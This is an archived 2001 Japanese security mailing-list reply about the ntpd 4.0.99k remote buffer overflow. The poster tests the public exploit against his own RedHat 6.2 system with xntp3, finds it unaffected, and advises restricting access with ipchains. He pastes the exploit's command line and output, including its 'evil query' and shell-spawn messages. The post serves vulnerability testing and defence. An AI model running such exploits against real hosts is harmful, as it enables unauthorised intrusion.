[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:00257] Re: ntpd =< 4.0.99k remote buffer overflow

To: security-talk@xxxxxxxxxxxxxxxxxxxx
Subject: [stalk:00257] Re: ntpd =< 4.0.99k remote buffer overflow
From: MICKY <micky@xxxxxxxxx>
Date: Thu, 05 Apr 2001 14:42:23 +0900



犬のみっきーです。

RedHat6.2j+xntp3-5.93-14で、とりあえず該当exploitが動作するか
確認してみました。

特に変化はみられません（あたりまえ）

とはいえ安心できませんので、特定ネットワーク以外はipchainsでdenyしと
くのが安全ですね。

[matrix]$ ./ntpd_remote -t2 210.253.169.19
ntpdx v1.0 by venglin@xxxxxxxxxxxxxxxxx

Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)

RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
[1] <- evil query (pkt = 512 | shell = 45)
[2] <- null query (pkt = 12)
Done.
/tmp/sh was spawned.
[matrix]$ ls -l /bin/bash
-rwxr-xr-x    1 root     root       310640 Nov 25 04:56 /bin/bash*

>----- みっきーのネットワーク研究所 -----<
>  http://www.hawkeye.ac/micky           <
>  所長：犬のみっきー <micky@xxxxxxxxx>  <
>----------------------------------------<

--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
　　　　◆桜も良いけど爽やか季節♪　～お出かけどこ行く？！
 http://www.infoseek.co.jp/Playspot?pg=playspot_top.html&svx=971122

Follow-Ups:
- [stalk:00258] Re: ntpd =< 4.0.99k remote buffer overflow
  - From: Seiichi Nakashima
- [stalk:00261] Re: ntpd =< 4.0.99k remote buffer overflow
  - From: T.Nakagawa

References:
- [stalk:00249] ntpd =< 4.0.99k remote buffer overflow
  - From: KOJIMA Hajime / 小島肇

Prev by Date: [stalk:00256] Re: ntpd =< 4.0.99k remote buffer overflow
Next by Date: [stalk:00258] Re: ntpd =< 4.0.99k remote buffer overflow
Previous by thread: [stalk:00302] Re: ntpd =< 4.0.99k remote buffer overflow
Next by thread: [stalk:00258] Re: ntpd =< 4.0.99k remote buffer overflow
Index(es):
- Date
- Thread